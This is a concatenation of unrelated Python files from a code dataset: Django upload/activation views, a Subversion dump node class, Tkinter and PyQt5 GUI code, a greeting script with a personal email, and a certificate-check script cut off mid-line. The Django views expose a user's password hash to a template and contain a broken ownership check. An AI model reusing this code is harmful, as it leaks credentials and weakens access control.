UserCreationForm\nfrom django.utils.encoding import force_bytes\nfrom django.utils.http import urlsafe_base64_encode\nfrom django.template.loader import render_to_string\nfrom tokens import account_activation_token\nfrom django.utils.encoding import force_text\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.utils.http import urlsafe_base64_decode\nfrom forms import SignUpForm\n# Create your views here.\n\ndef signup(request):\n if request.method ==\"POST\":\n form = SignUpForm(request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n user.is_active = False\n user.save()\n current_site = get_current_site(request)\n subject = 'Activate Your Account'\n message = render_to_string(\"account_activation_email.html\",{\n 'user':user,\n 'domain':current_site.domain,\n 'uid':urlsafe_base64_encode(force_bytes(user.id)),\n 'token':account_activation_token.make_token(user),\n })\n user.email_user(subject,message)\n return redirect('/account_activation_sent')\n else:\n form = SignUpForm()\n return render(request,'signup.html',{'form':form})\n\ndef account_activation_sent(request):\n return render(request,'register/account_activation.html')\n\n\ndef activate(request, uidb64, token):\n\n uid = force_text(urlsafe_base64_decode(uidb64))\n user = User.objects.get(pk=uid)\n username = user.username\n password = user.password\n\n if user is not None and account_activation_token.check_token(user, token):\n\n user.is_active = True\n user.profile.email_confirmed = True\n user.save()\n user.backend = 'django.contrib.auth.backends.ModelBackend'\n login(request, user)\n\n return redirect('/home')\n else:\n contexts={\n 'uidb64':uidb64,\n 'token':token,\n 'user':username,\n 'uid':uid,\n 'password':password,\n 'UserID':user,\n }\n return render(request, 'account_activation_invalid.html',contexts)\n\n\n@login_required\ndef index(request):\n if request.user.is_superuser:\n contexts ={\n 'all_data':upload.objects.all()\n }\n else:\n contexts ={\n 'all_data':upload.objects.filter(user = request.user)\n }\n return render(request, 'upload_form/index.html',contexts)\n\n@login_required\ndef uploads(request):\n form = uploadform()\n return render(request,'upload_form/upload.html',{'form':form})\n\n@login_required\ndef downloads(request):\n contexts ={\n 'all_data':upload.objects.all()\n }\n return render(request, 'upload_form/downloads.html',contexts)\n\n@require_POST\ndef checkfile(request):\n name = request.POST['filename']\n if upload.objects.filter(user = request.user,filename = name).exists():\n message ={'message':'fail'}\n return JsonResponse(message)\n else:\n message ={'message':'success'}\n return JsonResponse(message)\n\ndef send_email(request,action):\n subject = 'Notification'\n message = render_to_string(\"notification.html\",{\n 'user':request.user,\n 'action':action,\n 'files':request.POST['filename'].replace(\"?\",\"\\n\")\n })\n recipient_list = list(User.objects.filter(is_superuser=True).exclude(email__isnull=True).values_list('email',flat = True))\n send_mail(subject,message,from_email,recipient_list)\n return\n\n@require_POST\ndef save(request):\n name = request.POST['filename']\n u = upload(\n filename = name,\n uploadfile = request.FILES['uploadfile'],\n description = request.POST['description'],\n size = request.POST['size'],\n user = request.user)\n u.save()\n message2 = {'message':'success'}\n action = \"upload\"\n if not request.user.is_superuser:\n send_email(request,action)\n return JsonResponse(message2)\n\n@require_POST\ndef downloadfile(request):\n requestfile = request.POST['filename']\n flag = False\n val = requestfile.split(\"?\")\n val = filter(lambda str:str !='',val)\n if request.user.is_superuser:\n username = request.POST['name']\n val2 = username.split(\"?\")\n val2 = filter(lambda str:str !='',val2)\n filelist = []\n filename = []\n for i, value in enumerate(val):\n if request.user.is_superuser:\n if upload.objects.filter(filename = value,user=val2[i]).exists():\n path = upload.objects.get(filename = value,user=val2[i])\n downloadfile = path.uploadfile.url\n filelist.append(downloadfile)\n filename.append(value)\n else:\n contexts = {\n 'alert':'*The file does not exist.',\n 'all_data':upload.objects.all()\n}\n return render(request, 'upload_form/index.html',contexts)\n else:\n if upload.objects.filter(filename = value,user = request.user).exists:\n path = upload.objects.get(filename = value,user=request.user)\n downloadfile = path.uploadfile.url\n filelist.append(downloadfile)\n filename.append(value)\n flag = True\n else:\n contexts = {\n 'alert':'*The file does not exist.',\n 'all_data':upload.objects.all()\n}\n return render(request, 'upload_form/index.html',contexts)\n contexts = {\n 'downloadfile':filelist,\n 'filename':filename\n }\n if flag == True:\n action = \"download\"\n send_email(request,action)\n return render(request,'upload_form/downloading.html',contexts)\n raise Http404\n\n@require_POST\ndef deletefile(request):\n deletefile = request.POST['deletefile']\n val3 = deletefile.split(\"?\")\n val3 = filter(lambda str:str !='',val3)\n if request.user.is_superuser:\n username = request.POST['username']\n val4 = username.split(\"?\")\n val4 = filter(lambda str:str !='',val4)\n for i, value in enumerate(val3):\n if request.user.is_superuser:\n upload.objects.filter(filename = value,user = val4[i]).delete()\n else:\n upload.objects.filter(filename = value,user = request.user).delete()\n return HttpResponseRedirect('/home')\n","sub_path":"upload_form/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"320784924","text":"# ===============================================================================\n#\n# Copyright (C) 2003 Martin Furter \n#\n# This file is part of SvnDumpTool\n#\n# SvnDumpTool is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2, or (at your option)\n# any later version.\n#\n# SvnDumpTool is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with SvnDumpTool; see the file COPYING. If not, write to\n# the Free Software Foundation, 675 Mass Ave, Cambridge, MA 02139, USA.\n#\n# ===============================================================================\n\nfrom __future__ import print_function\n\nfrom os import stat, remove\nfrom stat import ST_SIZE\n\nfrom common import *\n\n__doc__ = \"\"\"SvnDumpNode class.\"\"\"\n\n\nclass SvnDumpNode:\n \"\"\"\n A node of a svn dump file.\n \"\"\"\n\n def __init__(self, path, action, kind):\n \"\"\"\n Initializes a new SvnDumpNode.\n\n @type path: string\n @param path: Path of this node.\n @type action: string\n @param action: Action of this node.\n Valid actions are:\n - 'add'\n - 'delete'\n - 'change'\n - 'replace'\n @type kind: string\n @param kind: Kind of this node ('dir' or 'file').\n If action is 'delete' kind may be the empty string.\n \"\"\"\n\n # check action\n if action != \"add\" and action != \"delete\" and \\\n action != \"change\" and action != \"replace\":\n raise SvnDumpException(\"Unknown action '%s'.\" % action)\n # check kind\n if action != \"change\":\n if kind != \"\" and kind != \"file\" and kind != \"dir\":\n raise SvnDumpException(\"Unknown kind '%s'\" % kind)\n else:\n if kind != \"file\" and kind != \"dir\":\n raise SvnDumpException(\"Unknown kind '%s'\" % kind)\n # check path +++\n\n # path of this node relative to the repository root\n self.__path = path\n # action: 'add', 'change', 'delete' or 'replace'\n self.__action = action\n # kind: 'file', 'dir' or 'node' if not known\n self.__kind = kind\n # list of properties name=>value pairs\n self.__properties = None\n # length of the text (file data)\n self.__text_len = -1\n # md5 hash of the text\n self.__text_md5 = \"\"\n # the from path if copied else \"\"\n self.__copy_from_path = \"\"\n # the from revision if copied else 0\n self.__copy_from_rev = 0\n # offset into the file\n self.__file_offset = -1\n # name of the (temp) file\n self.__file_name = \"\"\n # delete the temp file\n self.__file_delete = False\n # the file object to read from\n self.__file_obj = None\n\n def __del__(self):\n \"\"\"\n Delete method, cleanup temp file if needed.\n \"\"\"\n if self.__file_delete and self.__file_name != \"\":\n # delete temp file\n remove(self.__file_name)\n\n def get_path(self):\n \"\"\"\n Returns the path of this node.\n\n @rtype: string\n @return: The path of this node.\n \"\"\"\n return self.__path\n\n def set_path(self, path):\n \"\"\"\n Sets the path of this node.\n\n @type path: string\n @param path: New path of this node.\"\"\"\n self.__path = path\n\n def get_name(self):\n \"\"\"\n Returns the name of this node.\n\n @rtype: string\n @return: The name of this node.\n \"\"\"\n return self.__path.split(\"/\")[-1]\n\n def get_action(self):\n \"\"\"\n Returns the action of this node.\n\n @rtype: string\n @return: Either 'add', 'change', 'delete' or 'replace'.\n \"\"\"\n return self.__action\n\n def get_kind(self):\n \"\"\"\n Returns the kind of this node.\n\n @rtype: string\n @return: Either 'file', 'dir' or ''.\n \"\"\"\n return self.__kind\n\n def get_property(self, name):\n \"\"\"\n Returns the value of the property with the given name.\n\n If the property does not exist None is returned.\n\n @type name: string\n @param name: A property name.\n @rtype: string\n @return: Value of the property.\n \"\"\"\n if self.__properties is not None and self.__properties.has_key(name):\n return self.__properties[name]\n else:\n return None\n\n def has_properties(self):\n \"\"\"\n Returns True if this node has properties.\n\n @rtype: bool\n @return: True if this node has properties.\n \"\"\"\n return self.__properties is not None\n\n def get_properties(self):\n \"\"\"\n Returns the properties as a dict.\n\n @rtype: dict( string -> string )\n @return: The properties of this node.\n \"\"\"\n return self.__properties\n\n def has_text(self):\n \"\"\"\n Returns true when this node has text.\n\n @rtype: bool\n @return: True when this node has text.\n \"\"\"\n return self.__text_len >= 0\n\n def get_text_length(self):\n \"\"\"\n Returns the length of the text.\n\n @rtype: integer\n @return: Length of the text.\n \"\"\"\n return self.__text_len\n\n def has_md5(self):\n \"\"\"\n Returns true when this node has a MD5 sum.\n\n @rtype: bool\n @return: True when this node has a MD5 sum.\n \"\"\"\n return len(self.__text_md5) > 0\n\n def get_text_md5(self):\n \"\"\"\n Returns the MD5 hash of the text.\n\n @rtype: string\n @return: MD5 sum of the text.\n \"\"\"\n return self.__text_md5\n\n def has_copy_from(self):\n \"\"\"\n Returns True when this node has copy-from-path and copy-from-rev.\n\n @rtype: bool\n @return: True if this node has copy-from rev and path.\n \"\"\"\n return self.__copy_from_rev > 0 and self.__copy_from_path != \"\"\n\n def get_copy_from_path(self):\n \"\"\"\n Returns the path the node has been copied from or an empty string.\n\n @rtype: string\n @return: copy-from-path.\n \"\"\"\n return self.__copy_from_path\n\n def get_copy_from_rev(self):\n \"\"\"\n Returns the revision the node has been copied from or zero.\n\n @rtype: integer\n @return: copy-from-rev.\n \"\"\"\n return self.__copy_from_rev\n\n def set_copy_from_rev(self, revnr):\n \"\"\"\n Set the revision the node has been copied from.\n\n @rtype: integer\n @return: copy-from-rev.\n \"\"\"\n self.__copy_from_rev = revnr\n\n def set_copy_from(self, path, revnr):\n \"\"\"\n Sets copy-from-path and copy-from-rev.\n\n Only nodes with action 'add' or 'replace' may have copy-from\n revision and path.\n\n @type path: string\n @param path: copy-from-path\n @type revnr: integer\n @param revnr: copy-from-rev\n \"\"\"\n\n if self.__action != \"add\" and self.__action != \"replace\":\n raise SvnDumpException(\"Cannot set copy-from for action '%s'\" \\\n % self.__action)\n self.__copy_from_path = path\n self.__copy_from_rev = revnr\n\n def set_kind(self, kind):\n \"\"\"\n Set the kind of this node.\n\n The kind can only be set if it was empty.\n\n @type kind: string\n @param kind: New kind, either 'file' or 'dir'.\n \"\"\"\n if self.__kind != \"\":\n raise SvnDumpException(\"Cannot change node kind\")\n if kind != \"file\" and kind != \"dir\":\n raise SvnDumpException(\"Unknown kind '%s'\" % kind)\n self.__kind = kind\n\n def set_property(self, name, value):\n \"\"\"\n Sets a property of this node.\n\n Nodes with action 'delete' cannot have properties.\n\n @type name: string\n @param name: Name of the property.\n @type value: string\n @param value: Value of the property.\n \"\"\"\n\n if self.__action == \"delete\":\n raise SvnDumpException(\"Cannot set properties for action '%s'\" \\\n % self.__action)\n if self.__properties is None:\n self.__properties = {}\n self.__properties[name] = value\n\n def del_property(self, name):\n \"\"\"\n Deletes a property of this node.\n\n @type name: string\n @param name: Name of the property to delete.\"\"\"\n\n if self.__action == \"delete\":\n raise SvnDumpException(\"Cannot delete properties for action '%s'\" \\\n % self.__action)\n if self.__properties is not None:\n if self.__properties.has_key(name):\n del self.__properties[name]\n if len(self.__properties) == 0:\n self.__properties = None\n\n def set_properties(self, properties):\n \"\"\"\n Sets the properties for this node.\n\n @type properties: dict( string -> string )\n @param properties: A dict containing the properties.\n \"\"\"\n\n if self.__action == \"delete\":\n raise SvnDumpException(\"Cannot set properties for action '%s'\" \\\n % self.__action)\n self.__properties = properties\n\n def set_text_file(self, filename, length=-1, md5=\"\", delete=False):\n \"\"\"\n Sets the text for this node.\n\n The text will be read from the specified file.\n\n @type filename: string\n @param filename: Name of the file containing the text.\n @type length: integer, optional\n @param length: Length of the file.\n @type md5: string, optional\n @param md5: MD5 sum of the text if known.\n @type delete: bool\n @param delete: When True delete the file.\n \"\"\"\n\n if self.__action == \"delete\":\n raise SvnDumpException(\"Cannot set text for action '%s'\" \\\n % self.__action)\n if self.__kind != \"file\":\n raise SvnDumpException(\"Cannot set text for kind '%s'\" \\\n % self.__kind)\n self.__file_name = filename\n self.__file_offset = 0\n # hmm, no destructors, how to delete that damn temp file ? +++\n self.__file_delete = delete\n if length == -1:\n length = stat(filename)[ST_SIZE]\n self.__text_len = length\n self.__text_md5 = md5\n if not is_valid_md5_string(md5):\n self.__calculate_md5()\n\n def set_text_fileobj(self, fileobj, offset, length, md5):\n \"\"\"\n Sets the text for this node.\n\n The text will be read from the specified file object.\n\n @type fileobj: file object\n @param fileobj: A file object opened for reading and\n containing the text.\n @type offset: integer\n @param offset: Offset of the text.\n @type length: integer\n @param length: Length of the text.\n @type md5: string\n @param md5: MD5 sum of the text.\n \"\"\"\n\n if self.__action == \"delete\":\n raise SvnDumpException(\"Cannot set text for action '%s'\" \\\n % self.__action)\n if self.__kind != \"file\":\n raise SvnDumpException(\"Cannot set text for kind '%s'\" \\\n % self.__kind)\n self.__file_obj = fileobj\n self.__file_offset = offset\n self.__text_len = length\n self.__text_md5 = md5\n # if !is_valid_md5_string( md5 ) or length == -1:\n # self.__calculate_md5()\n\n def set_text_node(self, node):\n \"\"\"\n Sets the text for this node.\n\n The text will be that of the specified node.\n\n @type node: SvnDumpNode\n @param node: An other node.\n \"\"\"\n\n if self.__action == \"delete\":\n raise SvnDumpException(\"Cannot set text for action '%s'\" \\\n % self.__action)\n if self.__kind != \"file\":\n raise SvnDumpException(\"Cannot set text for kind '%s'\" \\\n % self.__kind)\n self.__file_name = node.__file_name\n # dunno how to delete temp file so no special action here +++\n self.__file_delete = node.__file_delete\n self.__file_obj = node.__file_obj\n self.__file_offset = node.__file_offset\n self.__text_len = node.__text_len\n self.__text_md5 = node.__text_md5\n\n def write_text_to_file(self, outfile):\n \"\"\"\n Writes the text to the given file object.\n\n @type outfile: file object\n @param outfile: A file object opened for writing.\n \"\"\"\n\n if self.__text_len == -1:\n raise SvnDumpException(\"Node %s has no text\" % self.__path)\n if len(self.__file_name) > 0:\n self.__file_obj = open(self.__file_name, \"rb\")\n else:\n self.__file_obj.seek(self.__file_offset)\n cnt = self.__text_len\n while cnt > 0:\n bcnt = cnt\n if bcnt > 16384:\n bcnt = 16384\n outfile.write(self.__file_obj.read(bcnt))\n cnt = cnt - bcnt\n if len(self.__file_name) > 0:\n self.__file_obj.close()\n self.__file_obj = None\n\n def text_open(self):\n \"\"\"\n Open text and return a handle for text read functions.\n\n Only one handle per dump file should be opened at the same time. A\n node for which the text has been set with set_text_node() virtually\n belongs also to the dump file of the node specified to\n set_text_node().\n\n Also while the handle is open write_text_to_file() should not be\n called.\n\n B{See also:} text_reopen(), text_read() and text_close().\n\n @rtype: 'opaque handle'\n @return: A handle for the text read functions.\n \"\"\"\n\n if self.__text_len == -1:\n raise SvnDumpException(\"node has no text\")\n\n # create handle\n handle = {}\n if len(self.__file_name) > 0:\n handle[\"file_obj\"] = open(self.__file_name, \"rb\")\n handle[\"close\"] = True\n handle[\"offset\"] = 0\n handle[\"length\"] = self.__text_len\n handle[\"pos\"] = 0\n else:\n handle[\"file_obj\"] = self.__file_obj\n handle[\"close\"] = False\n handle[\"offset\"] = self.__file_offset\n handle[\"length\"] = self.__text_len\n handle[\"pos\"] = 0\n self.__file_obj.seek(self.__file_offset)\n\n return handle\n\n def text_reopen(self, handle):\n \"\"\"\n Reopen the handle.\n\n Repositions the handle to the start of the text.\n\n B{See also:} text_open(), text_read() and text_close().\n\n @type handle: handle\n @param handle: A handle opened with text_open().\n \"\"\"\n\n handle[\"file_obj\"].seek(handle[\"offset\"])\n handle[\"pos\"] = 0\n\n def text_read(self, handle, count=16384):\n \"\"\"\n Read some text from a handle.\n\n B{See also:} text_open(), text_reopen() and text_close().\n\n @type handle: handle\n @param handle: A handle opened with text_open().\n @type count: integer, optional\n @param count: Count of bytes to read.\n @rtype: string\n @return: The data read.\n \"\"\"\n\n # end of text ?\n if handle[\"pos\"] >= handle[\"length\"]:\n return \"\"\n\n # is more text requested than remains\n if (handle[\"pos\"] + count) > handle[\"length\"]:\n count = handle[\"length\"] - handle[\"pos\"]\n # read it\n data = handle[\"file_obj\"].read(count)\n handle[\"pos\"] = handle[\"pos\"] + count\n return data\n\n def text_close(self, handle):\n \"\"\"\n Close the handle.\n\n B{See also:} text_open(), text_reopen() and text_read().\n\n @type handle: handle\n @param handle: A handle opened with text_open().\n \"\"\"\n\n if handle[\"close\"]:\n handle[\"file_obj\"].close()\n\n def __calculate_md5(self):\n \"\"\"\n Calculates the md5 of the text of this node.\n \"\"\"\n\n handle = self.text_open()\n md = sdt_md5()\n data = self.text_read(handle)\n n = 0\n while len(data) > 0:\n n = n + len(data)\n md.update(data)\n data = self.text_read(handle)\n self.__text_md5 = md.hexdigest()\n if self.__text_len == -1:\n self.__text_len = n\n self.text_close(handle)\n","sub_path":"svndump/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":16799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"199945608","text":"'''\nCreated on 13.03.2014\n@author: uzanto\n'''\n\nimport Tkinter as tk\nfrom tkSimpleDialog import Dialog\n\nfrom lib.ui.widgets.TkButtonGroup import TkButtonGroup\n\n\nclass TkTextEditDialog(Dialog):\n \n def __init__(self, master, title, **kwargs):\n self._default = kwargs.get(\"default\", \"\")\n self._width = kwargs.get(\"width\", 30)\n self._height = kwargs.get(\"height\", 5)\n Dialog.__init__(self, master, title)\n \n def unbind_return(self):\n self.unbind(\"\")\n \n def body(self, master):\n self._text = tk.Text(master, width=self._width, height=self._height)\n self._text.grid(row=0, column=0, padx=5, pady=5, sticky=\"nesw\")\n self._text.insert(\"end\", self._default)\n self.after(10, self.unbind_return)\n self._text.focus_set()\n \n def apply(self):\n value = self._text.get(\"1.0\", \"end\")\n value = value[:len(value)-1]\n self.result = value\n \n\n###\nclass TkAERListBox(tk.LabelFrame):\n \n def __init__(self, master, **kwargs):\n tk.LabelFrame.__init__(self, master, text=kwargs.get(\"label\"))\n self._width = kwargs.get(\"width\", 30)\n self._height = kwargs.get(\"height\", 10)\n self._values = []\n self._index = None\n self._init_ui()\n \n \n def _init_ui(self):\n self._listbox = tk.Listbox(self, selectmode=tk.SINGLE, width=self._width, height=self._height)\n self._listbox.bind(\"<>\", self.on_select)\n \n self._btgrp1 = TkButtonGroup(self, items=[[\"add\",self.addItem],\n [\"edit\",self.editItem],\n [\"rem\",self.removeItem]], orient=tk.HORIZONTAL)\n \n self._btgrp2 = TkButtonGroup(self, items=[[\"up\", self.moveUp],\n [\"down\", self.moveDown],\n [\"sort\", self.sortList]], orient=tk.HORIZONTAL)\n if self._width > 40:\n self._listbox.grid(row=0, column=0, columnspan=2, padx=2, pady=2, sticky=\"nw\") \n self._btgrp1.grid(row=1, column=0, padx=2, pady=2, sticky=\"nw\")\n self._btgrp2.grid(row=1, column=1, padx=2, pady=2, sticky=\"ne\")\n else:\n self._listbox.grid(row=0, column=0, padx=2, pady=2, sticky=\"nw\") \n self._btgrp1.grid(row=1, column=0, padx=2, pady=2, sticky=\"nw\")\n self._btgrp2.grid(row=2, column=0, padx=2, pady=2, sticky=\"nw\")\n \n def getValues(self):\n return self._values[:]\n \n def setValues(self, values):\n assert isinstance(values, list)\n self._values = values[:]\n \n def addItem(self):\n dlg = TkTextEditDialog(self, \"add\", default=\"\") \n if dlg.result != None:\n self._values.append(dlg.result)\n self._index = len(self._values)-1\n self.update_widget()\n \n def editItem(self):\n if self._index == None: return\n dlg = TkTextEditDialog(self, \"edit\", default=self._values[self._index])\n if dlg.result != None:\n self._values[self._index] = dlg.result\n self.update_widget()\n \n def removeItem(self):\n if self._index == None: return\n self._values.pop(self._index)\n self.update_widget()\n \n def moveUp(self):\n if self._index == None: return\n if self._index == 0: return\n self._values.insert(self._index-1, self._values.pop(self._index))\n self._index -= 1\n self.update_widget()\n \n def moveDown(self):\n if self._index == None: return\n if self._index == len(self._values)-1: return\n self._values.insert(self._index+1, self._values.pop(self._index))\n self._index += 1\n self.update_widget()\n \n def sortList(self):\n self._values.sort()\n self.update_widget()\n \n def on_select(self, *args):\n sel = self._listbox.curselection()\n if sel:\n self._index = int(sel[0])\n else:\n self._index = None\n \n def update_widget(self):\n self._listbox.delete(0, tk.END)\n for value in self._values:\n self._listbox.insert(tk.END, value)\n self._index = max(0, self._index)\n self._index = min(self._index, len(self._values)-1)\n if len(self._values) == 0:\n self._index = None\n else:\n self._listbox.selection_set(self._index)\n \n###\ndef test_TkAERListBox():\n app = tk.Tk()\n w = TkAERListBox(app)\n w.grid()\n app.mainloop()\n\nif __name__ == '__main__':\n test_TkAERListBox()","sub_path":"plx/lib/ui/widgets/TkAERListBox.py","file_name":"TkAERListBox.py","file_ext":"py","file_size_in_byte":4673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"221555326","text":"greeting = \"Hello World\"\nfirst_name = \"Princewill\"\nlast_name = \"Owoh\"\nHNGi7_ID = \"HNG-04232\"\nlanguage = \"python\"\nemail = \"princewillowoh18@gmail.com\"\n\n\ndef script():\n result = f'{greeting}, this is [{first_name}] [{last_name}] with HNGi7 ID [{HNGi7_ID}] using [{language}] for stage 2 task. {email}'\n return result\n\n\nprint(script())","sub_path":"scripts/princewill owoh.py","file_name":"princewill owoh.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"593064680","text":"# base\nimport sys\nimport time\nimport multiprocessing\nimport os\n\n# pyqt5 ui\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QFileDialog\nfrom ui import *\n\n# data structure - Template - docTopdf\nfrom src.data_structure import Solution\n\nSol = Solution() # 解决方案\n\nclass MyApp(QMainWindow, Ui_app): # 初始化\n\n def __init__(self, parent=None):\n\n super(MyApp, self).__init__(parent)\n self.setupUi(self) # 配置ui\n \n # 配置元素\n self.templateSelect.addItems(['2017年国家专项计划','2015年国家专项计划','2014年国家专项计划',\n '2013年国家专项计划','2012年国家专项计划','2011年国家专项计划','2010年国家专项计划',\n '2009年国家专项计划','2008年国家专项计划','国家重大科研项目',\n '国家重大科研课题 - 战略方向','国家重大科研课题 - 政府方向','国家重大科研课题 - 独立课题',\n '国家重大科研课题 - ITER项目','国家重大科研课题 - ITER课题']) # 设置模板选项\n \n # docTopdf\n def function_1(self):\n \n self.pool1 = int(self.setPool1.value()) # 进程数\n\n # 进程数最小为 1\n if self.pool1 == 0:\n self.pool1 = 1\n else:\n pass\n \n filelist = os.listdir(self.filep1) # 获取文件列表\n\n filesave = self.outfilep1 + '/docTopdf/' # 保存路径\n if not os.path.exists(filesave):\n os.makedirs(filesave) # if not exist\n \n wdfiles = [f for f in filelist if f.endswith((\".doc\", \".docx\"))] # 获取文件列表\n length = len(wdfiles) # 文件总数\n step = length // self.pool1 # STEP POOL FILE\n\n wdfilesClusters = [wdfiles[i:i+step] for i in range(0, length, step)] # WORD\n\n pool = multiprocessing.Pool(processes = self.pool1) # 创建进程池\n\n self.changeProgress(50) # 配置完成\n\n for wdfilesCluster in wdfilesClusters: # WORD多进程\n pool.apply_async(Sol.main_docTopdf, (self.filep1, wdfilesCluster, filesave))\n \n pool.close()\n pool.join() # 等待所有子进程结束\n\n self.changeProgress(100) # 任务结束\n\n # pdfTodata\n def function_2(self):\n\n self.pool2 = int(self.setPool2.value()) # 进程数\n \n # 进程数最小为 1\n if self.pool2 == 0:\n self.pool2 = 1\n else:\n pass\n \n filelist = os.listdir(self.filep2) # 获取文件列表\n\n self.template = self.templateSelect.currentIndex() # 获取模板索引\n \n pool = multiprocessing.Pool(processes = self.pool2) # 创建进程池\n\n self.changeProgress(50) # 配置完成\n\n for filename in filelist: # 任务开始\n filename = self.filep2 + '/' + filename\n pool.apply_async(Sol.main_pdfTodata, args=(self.template, filename, self.outfilep2)) # 多进程异步处理\n\n pool.close()\n pool.join() # 等待所有进程结束\n\n # 国家重大 ERROR额外处理\n if self.template == 9:\n Sol.key_error_add(self.outfilep2)\n \n self.changeProgress(100) # 任务结束\n\n\n # 文件选择 1\n def selectf_1(self):\n self.filep1 = QFileDialog.getExistingDirectory(self)\n self.fileSelect1.setText(self.filep1)\n\n # 文件选择 2\n def selectf_2(self):\n self.filep2 = QFileDialog.getExistingDirectory(self)\n self.fileSelect2.setText(self.filep2)\n\n # 更新进度条\n def changeProgress(self, num): # 0 =< num <= 100 int \n self.progressBar.setProperty('value',num)\n\n # 输出设置 1\n def outputf_1(self):\n self.outfilep1 = QFileDialog.getExistingDirectory(self)\n self.fileOutput1.setText(self.outfilep1)\n\n # 输出设置 2\n def outputf_2(self):\n self.outfilep2 = QFileDialog.getExistingDirectory(self)\n self.fileOutput2.setText(self.outfilep2)\n\n\nif __name__ == '__main__':\n\n multiprocessing.freeze_support() # python多进程打包\n\n app = QApplication(sys.argv)\n MainWin = MyApp()\n # 按钮设置\n MainWin.mstart1.clicked.connect(MainWin.function_1)\n MainWin.mstart2.clicked.connect(MainWin.function_2)\n MainWin.fileButton1.clicked.connect(MainWin.selectf_1) # 文件夹设置 1\n MainWin.fileButton2.clicked.connect(MainWin.selectf_2) # 文件夹设置 2\n MainWin.fileButton3.clicked.connect(MainWin.outputf_1) # 输出文件夹设置 1\n MainWin.fileButton4.clicked.connect(MainWin.outputf_2) # 输出文件夹设置 2\n # MainWin.templateSelect.addItems(['国家重点研发计划','2017年国家专项计划'])\n MainWin.show()\n sys.exit(app.exec_())\n","sub_path":"Archieve/PDF_document_data_structuring_program/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"595790745","text":"from django.urls import path\nfrom . import views\n\napp_name = 'posts'\n\nurlpatterns = [\n path('', views.main, name='main'),\n path('summoner//', views.detail, name='detail'),\n path('search/', views.search, name='search'),\n path('multi_search/', views.multi_search, name=\"multi_search\"),\n]","sub_path":"posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"251402243","text":"#!/usr/bin/env python3\n\nfrom datetime import tzinfo, timedelta, datetime\nimport subprocess, os, sys\nimport time\nimport json\nimport uuid\nimport falcon\nimport requests\nimport requests_cache\nimport dns.resolver\nimport OpenSSL\nimport ssl\nimport socket\nfrom wsgiref import simple_server\nimport argparse\nfrom pprint import pprint\nimport csv\n\n\nPATH = os.path.dirname(os.path.realpath(__file__)) + '/'\n\n\ndef http_recurse(htp, context):\n if not 'fqdn' in htp:\n return\n\n if 'tls' in htp:\n if 'certificate' in htp['tls']:\n if htp['tls']['certificate']['cert_valid'] != 'valid':\n if 'csv_writer' not in context:\n print(\"-> Not valid at FQDN: \", htp['fqdn'])\n print(\" -> \", htp['tls']['certificate']['subject'])\n print(\" -> \", htp['tls']['certificate']['issuer'])\n print(\" -> \", htp['tls']['certificate']['not_before_iso'])\n print(\" -> \", htp['tls']['certificate']['not_after_iso'])\n print(\" -> \", htp['tls']['certificate']['serial'])\n print(\" -> \", htp['tls']['certificate']['signature_algo'])\n print(\" -> \", htp['tls']['certificate']['common_name'])\n if 'subject_alt_names' in htp['tls']['certificate']:\n print(\" -> \", htp['tls']['certificate']['subject_alt_names'])\n else:\n print(\"====== No SANs ======\")\n else:\n # Write as CSV file row\n if 'subject_alt_names' in htp['tls']['certificate']:\n context['csv_writer'].writerow([htp['tls']['certificate']['subject'],\n htp['tls']['certificate']['issuer'],\n htp['tls']['certificate']['not_before_iso'],\n htp['tls']['certificate']['not_after_iso'],\n htp['tls']['certificate']['serial'],\n htp['tls']['certificate']['signature_algo'],\n htp['tls']['certificate']['common_name'],\n htp['tls']['certificate']['subject_alt_names']])\n else:\n context['csv_writer'].writerow([htp['tls']['certificate']['subject'],\n htp['tls']['certificate']['issuer'],\n htp['tls']['certificate']['not_before_iso'],\n htp['tls']['certificate']['not_after_iso'],\n htp['tls']['certificate']['serial'],\n htp['tls']['certificate']['signature_algo'],\n htp['tls']['certificate']['common_name'],\n \"-no SANs-\"])\n\n\n if 'recurse' in htp:\n h = htp['recurse']\n http_recurse(h, context)\n\n\n### Main\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\"query.py\")\n parser.add_argument(\"--input\",\n dest='input',\n help=\"Input list\",\n type=str)\n parser.add_argument(\"--csv\",\n dest='csv_output',\n help=\"CSV format output file\",\n type=str)\n parser.add_argument(\"--include-expired\",\n dest='include_expired',\n help=\"Should CSV format output file\",\n choices=['yes', 'no'],\n default='no',\n type=str)\n parser.add_argument(\"--months-prior-to-expiration\",\n dest='months_prior',\n help=\"How many months prio to expiration of the \" \\\n \"certificate should it be included in the list. \",\n default='1',\n type=str)\n args = parser.parse_args()\n\n # Config and other stuff is consolidated in the context\n context = {}\n context['include_expired'] = args.include_expired\n context['months_prior'] = args.months_prior\n\n\n if not args.input:\n print(\"No input\")\n sys.exit(1)\n\n raw = open(args.input, 'r').read()\n j_data = json.loads(raw)\n\n\n if args.csv_output:\n csv_file = open(args.csv_output, mode='w')\n csv_writer = csv.writer(csv_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\n # Store CSV writer\n context['csv_writer'] = csv_writer\n\n #pprint(j_data)\n\n for j_finding in j_data:\n if j_finding['rdtype'] != 'A':\n continue\n\n for rrset_item in 